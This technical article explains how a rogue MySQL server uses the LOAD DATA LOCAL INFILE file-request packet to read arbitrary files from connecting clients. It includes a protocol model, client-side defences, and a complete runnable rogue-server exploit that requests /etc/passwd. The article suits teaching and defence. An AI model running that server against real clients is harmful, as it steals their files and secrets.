Mysql Client Learning to Read Arbitrary Files

In this article we look at a weakness in the client side of MySQL's LOAD DATA LOCAL INFILE feature that lets a malicious server read arbitrary files from any client that connects to it. It showed up in the recent DDCTF and in a national competition, where it was used to read sensitive data from the client machine.

Vulnerability Causes

The root cause is the LOAD DATA INFILE statement, which is documented in the MySQL reference manual. In its plain form the server reads a file from its own filesystem into a table. With the LOCAL keyword (LOAD DATA LOCAL INFILE) it is the client that opens the file and streams its contents to the server. To make that work, the protocol lets the server tell the client which file to open, and the client obeys without checking that it actually issued a LOAD DATA LOCAL statement for that file. A server under an attacker's control can therefore ask for any file the client process is able to read.

File-Transfer Data Packet

During LOAD DATA LOCAL INFILE the client does not keep track of the file name it put in its own statement. It simply waits for the server's reply to the query: if that reply is a file-request packet (a first byte of 0xFB followed by a file name), the client opens the named file and sends its contents. Nothing ties the name in the server's packet to the name in the client's statement, and nothing requires the client's statement to have been a LOAD DATA at all. Whoever controls the server controls which file the client reads.

Packets Analysis

Let's analyze the packets exchanged between the client and server for a LOAD DATA LOCAL INFILE statement. Every packet carries a 3-byte length and a 1-byte sequence id, and the sequence id restarts at 0 for each command the client sends:

  1. The server sends a greeting (handshake) packet: protocol version, server version string, connection (thread) id, a 20-byte scramble, its capability flags (which is where it advertises, or withholds, SSL support and LOCAL file support) and the name of the authentication plugin the client should use.
  2. The client answers with a login packet: its own capability flags, maximum packet size, character set, user name and an authentication token computed from the password and the scramble (for mysql_native_password a SHA1-based challenge-response token, not the password itself). The server replies with an OK packet.
  3. The client sends a COM_QUERY packet carrying the statement text, for example LOAD DATA LOCAL INFILE '/tmp/data.csv' INTO TABLE t.
  4. The server responds with a file-request packet: a single 0xFB byte followed by the name of the file it wants. This is the packet the client acts on.
  5. The client opens that file, sends its contents in one or more data packets, and then an empty packet to mark the end of the file.
  6. The server responds with an OK packet (or an ERR packet if the load failed), which tells the client the statement is finished.
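The exchange above, modelled on the client side as an added example (this is not code from the original article): it frames and unframes packets, classifies the server's reply to a query by its header byte, and contrasts the behaviour the article describes (a client that honours any 0xFB packet as long as LOCAL is enabled, and refuses it when LOCAL is off, which is the documented effect of --local-infile=0) with a stricter hypothetical rule that only sends a file when the client's own statement was a LOAD DATA LOCAL INFILE naming that same file. All packets, queries and file contents are constructed for the example; `hardened_client_reaction` and the `LOAD_LOCAL` regex are my own and not what any shipped client implements.

```python
import re

# Added example: the client side of the LOAD DATA LOCAL exchange, modelled in Python.
# All packets and file contents below are constructed by hand for this example.
# Framing is the real wire format: 3-byte little-endian length, 1-byte sequence id, payload.

def frame(payload, seq):
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload

def unframe(stream):
    """Split a byte stream into a list of (sequence id, payload) tuples."""
    packets, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        packets.append((stream[pos + 3], stream[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return packets

def classify_response(payload):
    """Name the first packet a server sends in reply to COM_QUERY by its header byte."""
    if not payload:
        return "empty"
    return {0x00: "ok", 0xFF: "err", 0xFB: "local_infile_request"}.get(payload[0], "resultset")

def stock_client_reaction(response, local_infile_enabled):
    """The behaviour this article is about: honour a 0xFB packet whenever LOCAL is
    switched on, without asking whether the client ever issued a LOAD DATA LOCAL."""
    kind = classify_response(response)
    if kind != "local_infile_request":
        return kind, None
    if not local_infile_enabled:
        return "refuse", "LOCAL INFILE disabled on the client"
    return "send_file", response[1:].decode()

# Hypothetical stricter rule (my own, not what any shipped client does): only hand over a
# file if the statement we sent was LOAD DATA LOCAL INFILE and it named that same file.
LOAD_LOCAL = re.compile(
    r"^\s*LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+(['\"])([^'\"]*)\1",
    re.I)

def hardened_client_reaction(query, response, local_infile_enabled):
    kind, detail = stock_client_reaction(response, local_infile_enabled)
    if kind != "send_file":
        return kind, detail
    m = LOAD_LOCAL.match(query)
    if m is None:
        return "refuse", "server asked for %s but the statement was not LOAD DATA LOCAL" % detail
    if m.group(2) != detail:
        return "refuse", "server asked for %s, the statement named %s" % (detail, m.group(2))
    return "send_file", detail

def client_file_packets(file_bytes, seq, chunk=16):
    """How the client ships the file: one or more data packets, then an empty packet."""
    out = b""
    for i in range(0, len(file_bytes), chunk):
        out += frame(file_bytes[i:i + chunk], seq)
        seq += 1
    return out + frame(b"", seq)

# Constructed exchange: the rogue server answers the CLI's opening query with a
# request for /etc/passwd instead of a result set.
OPENING_QUERY = "select @@version_comment limit 1"
ROGUE_RESPONSE = b"\xfb/etc/passwd"
LEGIT_QUERY = "LOAD DATA LOCAL INFILE '/tmp/data.csv' INTO TABLE t"
LEGIT_RESPONSE = b"\xfb/tmp/data.csv"

if __name__ == "__main__":
    print("stock client, LOCAL on :", stock_client_reaction(ROGUE_RESPONSE, True))
    print("stock client, LOCAL off:", stock_client_reaction(ROGUE_RESPONSE, False))
    print("strict client, rogue   :", hardened_client_reaction(OPENING_QUERY, ROGUE_RESPONSE, True))
    print("strict client, legit   :", hardened_client_reaction(LEGIT_QUERY, LEGIT_RESPONSE, True))
    print(unframe(client_file_packets(b"root:x:0:0:root:/root:/bin/bash\n", 2)))
```

Run it directly to see the scenarios side by side. The interesting one is the rogue case: the CLI's own opening query, select @@version_comment limit 1, gets answered with a request for /etc/passwd, and the stock rule hands the file over while the stricter rule refuses because the statement was never a LOAD DATA LOCAL.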

Exploiting the Vulnerability

To exploit this, the attacker runs a server that speaks the handshake, accepts whatever credentials it is offered and then, in reply to the first query the client sends, returns a file-request packet naming the file it wants. The attacker never issues a LOAD DATA statement: the client reacts to the packet, not to its own statement, and the mysql command-line client even sends a query of its own (select @@version_comment limit 1) immediately after logging in, so merely connecting is enough. All that is required is a client with LOCAL enabled that connects to a host the attacker controls.

Malicious Server

Here is a minimal Python 3 rogue server that exploits this: it accepts whatever credentials the client offers, then answers the client's first query with a file-request packet instead of a result set:

import socket

# Rogue MySQL server: speaks just enough of the protocol to get through the handshake,
# then answers the client's first query with a file-request packet for TARGET_FILE.
# A client with LOCAL enabled reads that file and sends it back. Any login is accepted.
TARGET_FILE = b"/etc/passwd"
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"  # OK: 0 rows, 0 insert id, autocommit, 0 warnings

def packet(payload, seq):
    # Framing: 3-byte little-endian payload length, then a 1-byte sequence id
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload

def recv_packet(sock):
    # Returns (sequence id, payload), or (None, b"") once the client hangs up
    header = sock.recv(4)
    if len(header) < 4:
        return None, b""
    length = int.from_bytes(header[:3], "little")
    payload = b""
    while len(payload) < length:
        chunk = sock.recv(length - len(payload))
        if not chunk:
            break
        payload += chunk
    return header[3], payload

def greeting():
    # Protocol::HandshakeV10. CLIENT_SSL (0x800) is deliberately not advertised, so a
    # client using the default --ssl-mode=PREFERRED silently stays in plaintext.
    caps = 0x1 | 0x4 | 0x8 | 0x80 | 0x200 | 0x2000 | 0x8000 | 0x80000  # LOCAL_FILES, PROTOCOL_41, PLUGIN_AUTH, ...
    return (b"\x0a" + b"5.7.29-rogue\x00"        # protocol version 10, server version string
            + (1).to_bytes(4, "little")          # connection (thread) id
            + b"12345678" + b"\x00"              # first 8 scramble bytes, filler
            + (caps & 0xFFFF).to_bytes(2, "little")  # capability flags, low 16 bits
            + b"\x21"                            # character set: utf8_general_ci
            + (0x0002).to_bytes(2, "little")     # status flags: SERVER_STATUS_AUTOCOMMIT
            + (caps >> 16).to_bytes(2, "little") # capability flags, high 16 bits
            + b"\x15" + b"\x00" * 10             # scramble length (21), reserved bytes
            + b"123456789012" + b"\x00"          # remaining 12 scramble bytes, NUL
            + b"mysql_native_password\x00")      # auth plugin the client is told to use

def handle_request(client_socket):
    client_socket.sendall(packet(greeting(), 0))
    seq, login = recv_packet(client_socket)      # HandshakeResponse41; credentials never verified
    if seq is not None:
        client_socket.sendall(packet(OK_PACKET, seq + 1))
    seq, query = recv_packet(client_socket)      # e.g. COM_QUERY "select @@version_comment limit 1"
    if query and query[0] == 0x03:               # 0x03 = COM_QUERY; the statement text is irrelevant
        client_socket.sendall(packet(b"\xfb" + TARGET_FILE, seq + 1))  # file-request packet
        contents = b""
        while True:                              # data packets, terminated by an empty packet
            seq, chunk = recv_packet(client_socket)
            if not chunk:
                break
            contents += chunk
        print(contents.decode("utf-8", errors="replace"))
        if seq is not None:
            client_socket.sendall(packet(OK_PACKET, seq + 1))
    client_socket.close()

def main():
    # Listen on the standard MySQL port and serve one victim at a time
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(("0.0.0.0", 3306))
    server_socket.listen(1)
    while True:
        client_socket, client_address = server_socket.accept()
        handle_request(client_socket)

if __name__ == "__main__":
    main()

Means of Defense

Two client-side settings close this off:

  1. Disable LOCAL on the client. Start the mysql client with --local-infile=0, put local-infile=0 under [client] in my.cnf, or use the equivalent option of your connector. A client that has not enabled LOCAL rejects the file-request packet. Only clients that genuinely need LOAD DATA LOCAL should enable it, and only against servers they trust.
  2. Authenticate the server. --ssl-mode=VERIFY_IDENTITY (with --ssl-ca pointing at the CA that issued the server certificate) makes the client refuse to talk to anything that cannot prove it is the expected host. The default PREFERRED mode does not help, because a rogue server simply leaves the SSL capability flag unset and the client quietly falls back to plaintext.

Also keep in mind that the rogue server does not need a valid password: it accepts any login, so credential strength is no protection here.

Conclusion

In conclusion, the LOAD DATA LOCAL INFILE feature lets the server name the file the client should upload, and the client complies without checking that it ever asked for that file. A rogue server that answers any query with a file-request packet can therefore read any file the connecting client process can access. Disable LOCAL on clients that do not need it (--local-infile=0), and where a client must reach a server over an untrusted path, authenticate the server with --ssl-mode=VERIFY_IDENTITY so the client cannot be steered to an impostor.